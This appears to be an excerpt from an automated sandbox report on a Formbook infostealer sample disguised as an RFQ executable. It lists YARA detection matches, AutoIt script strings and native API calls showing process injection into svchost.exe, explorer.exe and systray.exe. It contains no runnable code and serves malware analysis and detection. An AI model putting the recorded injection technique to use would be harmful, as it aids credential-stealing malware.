          Source: 1.2.MKCC-MEC-RFQ-115-2024.exe.1890000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.3876371079.0000000004A70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.3876371079.0000000004A70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.3876371079.0000000004A70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.3875926072.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.3875926072.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.3875926072.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.3876413430.0000000004AA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.3876413430.0000000004AA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.3876413430.0000000004AA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.1479792020.0000000002760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.1479792020.0000000002760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.1479792020.0000000002760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.1479642617.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.1479642617.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.1479642617.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.1432605564.0000000001890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.1432605564.0000000001890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.1432605564.0000000001890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.1479901352.0000000002790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.1479901352.0000000002790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.1479901352.0000000002790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: MKCC-MEC-RFQ-115-2024.exe PID: 7720, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: svchost.exe PID: 7752, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: systray.exe PID: 7800, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Binary is likely a compiled AutoIt script file
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: This is a third-party compiled AutoIt script.1_2_000E3B4C
          Source: MKCC-MEC-RFQ-115-2024.exeString found in binary or memory: This is a third-party compiled AutoIt script.
          Source: MKCC-MEC-RFQ-115-2024.exe, 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_fbeb53f4-3
          Source: MKCC-MEC-RFQ-115-2024.exe, 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_a5fbb633-d
          Source: MKCC-MEC-RFQ-115-2024.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_27bae220-3
          Source: MKCC-MEC-RFQ-115-2024.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_1ab80c4c-0
          Initial sample is a PE file and has a suspicious name
          Source: initial sampleStatic PE information: Filename: MKCC-MEC-RFQ-115-2024.exe
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A350 NtCreateFile,2_2_0041A350
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A400 NtReadFile,2_2_0041A400
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A480 NtClose,2_2_0041A480
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A530 NtAllocateVirtualMemory,2_2_0041A530
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A47F NtClose,2_2_0041A47F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A52A NtAllocateVirtualMemory,2_2_0041A52A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072B60 NtClose,LdrInitializeThunk,2_2_03072B60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072BF0 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_03072BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072AD0 NtReadFile,LdrInitializeThunk,2_2_03072AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072F30 NtCreateSection,LdrInitializeThunk,2_2_03072F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072F90 NtProtectVirtualMemory,LdrInitializeThunk,2_2_03072F90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072FB0 NtResumeThread,LdrInitializeThunk,2_2_03072FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072FE0 NtCreateFile,LdrInitializeThunk,2_2_03072FE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072E80 NtReadVirtualMemory,LdrInitializeThunk,2_2_03072E80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_03072EA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072D10 NtMapViewOfSection,LdrInitializeThunk,2_2_03072D10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072D30 NtUnmapViewOfSection,LdrInitializeThunk,2_2_03072D30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072DD0 NtDelayExecution,LdrInitializeThunk,2_2_03072DD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03072DF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03072C70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072CA0 NtQueryInformationToken,LdrInitializeThunk,2_2_03072CA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03074340 NtSetContextThread,2_2_03074340
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03074650 NtSuspendThread,2_2_03074650
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072B80 NtQueryInformationFile,2_2_03072B80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072BA0 NtEnumerateValueKey,2_2_03072BA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072BE0 NtQueryValueKey,2_2_03072BE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072AB0 NtWaitForSingleObject,2_2_03072AB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072AF0 NtWriteFile,2_2_03072AF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072F60 NtCreateProcessEx,2_2_03072F60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072FA0 NtQuerySection,2_2_03072FA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072E30 NtWriteVirtualMemory,2_2_03072E30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072EE0 NtQueueApcThread,2_2_03072EE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072D00 NtSetInformationFile,2_2_03072D00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072DB0 NtEnumerateKey,2_2_03072DB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072C00 NtQueryInformationProcess,2_2_03072C00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072C60 NtCreateKey,2_2_03072C60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072CC0 NtQueryVirtualMemory,2_2_03072CC0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072CF0 NtOpenProcess,2_2_03072CF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073010 NtOpenDirectoryObject,2_2_03073010
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073090 NtSetValueKey,2_2_03073090
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030735C0 NtCreateMutant,2_2_030735C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030739B0 NtGetContextThread,2_2_030739B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073D10 NtOpenProcessToken,2_2_03073D10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073D70 NtOpenThread,2_2_03073D70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F1A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,RtlQueueApcWow64Thread,NtResumeThread,NtClose,2_2_02F1A036
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F1A042 NtQueryInformationProcess,2_2_02F1A042
          Source: C:\Windows\explorer.exeCode function: 3_2_10D1DE12 NtProtectVirtualMemory,3_2_10D1DE12
          Source: C:\Windows\explorer.exeCode function: 3_2_10D1C232 NtCreateFile,3_2_10D1C232
          Source: C:\Windows\explorer.exeCode function: 3_2_10D1DE0A NtProtectVirtualMemory,3_2_10D1DE0A
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D82CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_04D82CA0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D82C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_04D82C70
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D82C60 NtCreateKey,LdrInitializeThunk,4_2_04D82C60
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D82DD0 NtDelayExecution,LdrInitializeThunk,4_2_04D82DD0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D82DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_04D82DF0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D82D10 NtMapViewOfSection,LdrInitializeThunk,4_2_04D82D10
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D82EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_04D82EA0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D82FE0 NtCreateFile,LdrInitializeThunk,4_2_04D82FE0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D82F30 NtCreateSection,LdrInitializeThunk,4_2_04D82F30
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D82AD0 NtReadFile,LdrInitializeThunk,4_2_04D82AD0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D82BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_04D82BF0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D82BE0 NtQueryValueKey,LdrInitializeThunk,4_2_04D82BE0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D82B60 NtClose,LdrInitializeThunk,4_2_04D82B60
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D835C0 NtCreateMutant,LdrInitializeThunk,4_2_04D835C0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D84650 NtSuspendThread,4_2_04D84650
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D84340 NtSetContextThread,4_2_04D84340
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D82CC0 NtQueryVirtualMemory,4_2_04D82CC0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D82CF0 NtOpenProcess,4_2_04D82CF0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D82C00 NtQueryInformationProcess,4_2_04D82C00
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D82DB0 NtEnumerateKey,4_2_04D82DB0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D82D00 NtSetInformationFile,4_2_04D82D00
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D82D30 NtUnmapViewOfSection,4_2_04D82D30
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D82EE0 NtQueueApcThread,4_2_04D82EE0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D82E80 NtReadVirtualMemory,4_2_04D82E80
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D82E30 NtWriteVirtualMemory,4_2_04D82E30
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D82F90 NtProtectVirtualMemory,4_2_04D82F90
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D82FB0 NtResumeThread,4_2_04D82FB0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D82FA0 NtQuerySection,4_2_04D82FA0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D82F60 NtCreateProcessEx,4_2_04D82F60
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D82AF0 NtWriteFile,4_2_04D82AF0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D82AB0 NtWaitForSingleObject,4_2_04D82AB0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D82B80 NtQueryInformationFile,4_2_04D82B80
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D82BA0 NtEnumerateValueKey,4_2_04D82BA0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D83090 NtSetValueKey,4_2_04D83090
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D83010 NtOpenDirectoryObject,4_2_04D83010
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D83D70 NtOpenThread,4_2_04D83D70
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D83D10 NtOpenProcessToken,4_2_04D83D10
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04D839B0 NtGetContextThread,4_2_04D839B0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_02E6A350 NtCreateFile,4_2_02E6A350
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_02E6A480 NtClose,4_2_02E6A480
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_02E6A400 NtReadFile,4_2_02E6A400
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_02E6A530 NtAllocateVirtualMemory,4_2_02E6A530
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_02E6A47F NtClose,4_2_02E6A47F
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_02E6A52A NtAllocateVirtualMemory,4_2_02E6A52A
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04C0A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,RtlQueueApcWow64Thread,NtResumeThread,4_2_04C0A036
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04C09BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,4_2_04C09BAF
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04C0A042 NtQueryInformationProcess,4_2_04C0A042
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04C09BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_04C09BB2
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_00144021: CreateFileW,DeviceIoControl,CloseHandle,1_2_00144021
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_00138858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,1_2_00138858
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_0014545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,1_2_0014545F
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_000EE8001_2_000EE800
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_0010DBB51_2_0010DBB5
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_0016804A1_2_0016804A
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_000EE0601_2_000EE060
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_000F41401_2_000F4140
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_001024051_2_00102405
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_001165221_2_00116522
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_0011267E1_2_0011267E
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_001606651_2_00160665
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_0010283A1_2_0010283A
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_000F68431_2_000F6843
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_001189DF1_2_001189DF
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_000F8A0E1_2_000F8A0E
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_00116A941_2_00116A94
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_00160AE21_2_00160AE2
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_00148B131_2_00148B13
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_0013EB071_2_0013EB07
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_0010CD611_2_0010CD61
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_001170061_2_00117006
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_000F710E1_2_000F710E
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_000F31901_2_000F3190
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_000E12871_2_000E1287
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_001033C71_2_001033C7
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_0010F4191_2_0010F419
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_000F56801_2_000F5680
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_001016C41_2_001016C4
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_001078D31_2_001078D3
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_000F58C01_2_000F58C0
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_00101BB81_2_00101BB8
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_00119D051_2_00119D05
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_000EFE401_2_000EFE40
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_00101FD01_2_00101FD0
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_0010BFE61_2_0010BFE6
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_00EF36301_2_00EF3630
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004010302_2_00401030
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E28F2_2_0041E28F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041DB1D2_2_0041DB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041DC792_2_0041DC79
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E57F2_2_0041E57F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402D882_2_00402D88
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402D902_2_00402D90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041DDB72_2_0041DDB7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00409E4B2_2_00409E4B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00409E502_2_00409E50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041D7702_2_0041D770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402FB02_2_00402FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FA3522_2_030FA352
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E3F02_2_0304E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031003E62_2_031003E6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E02742_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C02C02_2_030C02C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030301002_2_03030100
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA1182_2_030DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C81582_2_030C8158
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F41A22_2_030F41A2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031001AA2_2_031001AA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F81CC2_2_030F81CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D20002_2_030D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030647502_2_03064750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030407702_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303C7C02_2_0303C7C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305C6E02_2_0305C6E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030405352_2_03040535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031005912_2_03100591
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E44202_2_030E4420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F24462_2_030F2446
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EE4F62_2_030EE4F6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FAB402_2_030FAB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F6BD72_2_030F6BD7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA802_2_0303EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030569622_2_03056962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A02_2_030429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0310A9A62_2_0310A9A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304A8402_2_0304A840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030428402_2_03042840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030268B82_2_030268B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E8F02_2_0306E8F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03082F282_2_03082F28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03060F302_2_03060F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E2F302_2_030E2F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B4F402_2_030B4F40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BEFA02_2_030BEFA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032FC82_2_03032FC8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304CFE02_2_0304CFE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FEE262_2_030FEE26
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040E592_2_03040E59
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052E902_2_03052E90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FCE932_2_030FCE93
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FEEDB2_2_030FEEDB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304AD002_2_0304AD00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DCD1F2_2_030DCD1F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03058DBF2_2_03058DBF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303ADE02_2_0303ADE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040C002_2_03040C00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0CB52_2_030E0CB5
